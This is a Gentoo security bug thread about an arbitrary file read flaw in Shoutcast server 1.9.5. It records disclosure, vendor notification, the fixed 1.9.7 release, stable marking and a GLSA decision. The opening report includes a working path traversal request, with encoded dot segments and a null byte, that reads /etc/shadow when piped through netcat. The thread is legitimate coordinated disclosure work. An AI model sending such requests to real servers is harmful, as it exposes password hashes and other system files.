Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 136721

Summary: media-sound/shoutcast-server-bin Arbitrary file read
Product: Gentoo Security Reporter: Peter Kosinar <goober>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: normal CC: eradicator, sound
Priority: High    
Version: unspecified   
Hardware: x86   
OS: Linux   
URL: http://people.ksp.sk/~goober/advisory/001-shoutcast.html
Whiteboard: B4 [glsa] DerCorny
Package list:
Runtime testing required: ---

Description Peter Kosinar 2006-06-13 16:51:22 UTC
Shoutcast server 1.9.5 allows any remote attacker who can reach the server's port to read arbitrary files on the machine. Sample request can be obtained using the following command:

echo -e "GET /content/%2E./.%2E/%2E%2E/etc/shadow%00.mp3\n"

which, when piped through netcat to the listening Shoutcast server, should show the contents of /etc/shadow file. The complete advisory (written for a different target audience, though; so it contains some uninteresting details) can be found at http://people.ksp.sk/~goober/advisory/001-shoutcast.html

The vendor (Nullsoft) has NOT been contacted yet, for I failed to find any security contact and didn't feel very much like posting this information to their public forums.
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-14 02:56:02 UTC
Jeremy you touched this one before Chris White. Could you please advise?

@Peter is link public?
Comment 2 Peter Kosinar 2006-06-14 04:09:23 UTC
No, the link is not public and will not become public until the vulnerability is resolved.
Comment 3 Jeremy Huddleston (RETIRED) gentoo-dev 2006-06-16 12:57:01 UTC
Well, this is a binary package.  We can't do anything until upstream releases a new version.  The workarounds are valid, but we can't really force that on users as I'm sure many won't want to not run it in a chroot jail.

As for executing as a unpriv user, that's a good idea in general, and I don't see why that wasn't the case already.

We need to notify upstream.  I'd look for personal contact info for the developers.  Additionally, I believe NullSoft is still owned by AOL, so you might be able to contact AOL's security team for the contact information.
Comment 4 Peter Kosinar 2006-06-22 15:32:25 UTC
The upstream released a new version for Linux today. Preliminary tests show that the original vulnerability is no longer present, but the changes introduced a new, very similar one. Thus, the actual version (1.9.6) is NOT safe yet.
Comment 5 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-22 15:42:20 UTC
Peter, is upstream informed that it's still flawed?
Comment 6 Peter Kosinar 2006-06-22 15:57:47 UTC
Yes, the vendor has been notified a few minutes ago.
Comment 7 Peter Kosinar 2006-06-23 13:00:33 UTC
Okay, upstream released 1.9.7 today, vulnerabilities (original one + the new ones caused by the first fix) are apparently fixed.
Comment 8 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-24 07:34:19 UTC
eradicator, please bump. Shoutcast mentioned the security issues on their homepage and their board, so this is public. Peter, may we open this bug to the public, too?
Comment 9 Peter Kosinar 2006-06-24 07:48:53 UTC
As the fixed version is available, I see no problems with opening it.
Comment 10 Jeremy Huddleston (RETIRED) gentoo-dev 2006-06-24 22:26:25 UTC
I am on vacation in Hawaii and don't have access to my box to test the new software.
Comment 11 Jeremy Huddleston (RETIRED) gentoo-dev 2006-06-24 22:42:41 UTC
I am on vacation in Hawaii and don't have access to my box to test the new software.

sound: Can someone please bump this and test it?
Comment 12 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-25 06:49:45 UTC
amd64 and x86 please test and mark stable, but beware: i haven't slept for 30h
Comment 13 Raúl Porcel (RETIRED) gentoo-dev 2006-06-28 13:48:27 UTC
Tested in x86 and works pretty fine, i'm listening right now my music.
Should be marked as stable.
Comment 14 Chris Gianelloni (RETIRED) gentoo-dev 2006-06-29 12:26:44 UTC
Stable on amd64/x86... thanks for testing...
Comment 15 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-30 08:47:09 UTC
This one is ready for GLSA decision.
Comment 16 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-30 08:55:20 UTC
mhh, weak yes, but i wouldn't mind a no
Comment 17 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-30 08:55:46 UTC
mhh, weak yes, but i wouldn't mind a no
Comment 18 Wolf Giesen (RETIRED) gentoo-dev 2006-06-30 09:17:56 UTC
Kinda silly, but YES.
Comment 19 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-30 09:19:26 UTC
Voting yes, so let's have a GLSA more.
Comment 20 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-07-09 10:37:19 UTC
GLSA 200607-05